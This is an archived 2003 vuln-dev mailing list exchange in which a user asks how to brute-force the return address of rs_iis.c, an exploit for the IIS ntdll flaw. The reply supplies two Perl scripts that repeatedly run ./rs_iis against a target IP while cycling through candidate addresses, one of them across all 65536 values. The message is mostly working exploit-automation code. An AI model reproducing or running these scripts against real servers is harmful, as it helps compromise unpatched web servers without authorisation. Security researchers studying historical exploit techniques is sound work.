Well, I suppose you are meaning something like: #!/usr/bin/perl $IP = @ARGV[0]; while ($x < 256) { $x++; $y = sprintf("%02x",$x); print "Trying at: $IP 0x${y}04 port 20${x}\n"; $output = `./rs_iis $IP 80 20${x} 0x${y}04`; print "$output\n"; } You can run it with "brute.pl IP" You could run it with all possible 65536 possibilities, but that's probably overkill. #!/usr/bin/perl $IP = @ARGV[0]; while ($x < 65536) { $x++; $y = sprintf("%04x",$x); $output = `./rs_iis $IP 80 12345 0x${y}`; print "$output\n"; } maarten ----- Original Message ----- From: "Jeremy Junginger" <jjat_private> To: <vuln-devat_private> Sent: Monday, March 31, 2003 5:14 PM Subject: Generating Hex Numbers to brute force rs_iis.c Hey guys, In playing with rs_iis.c (ntdll exploit) in our lab, I've been looking for ways to brute force the return address. I know there's been a shell script (rs_brute.sh) released that already does this, but since I've been playing with PERL lately (and since this shell script did not exist when I began playing with the exploit), I thought I'd take a whack at producing the RET addresses (0x0000-0xffff) in a PERL script. I just wanted to get your input and see if there is and easier way to do this (using PERL, of course). Basically, the goal is as follows: 1) generate Hex Numbers from 0x0000 to 0xffff in the following pattern (0x0000 0x0101 0x0202...0xfdfd 0xfefe 0xffff) 2) pass the output to rs_iis via system() command? So far, I can generate the output and print it to stdout. Any tips on getting the script to run rs_iis once with each address produced by the script? Also, is there a way to produce this output without creating an array like this? #!/usr/bin/perl -w @HexD = ('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'); for ($i = 0; $i <= 255; $i += 1) { printf("$HexD[int($i / 16)]$HexD[$i % 16]", $i); printf("$HexD[int($i / 16)]$HexD[$i % 16]\n", $i); } Many thanks, -Jeremy
This archive was generated by hypermail 2b30 : Thu Apr 03 2003 - 09:48:36 PST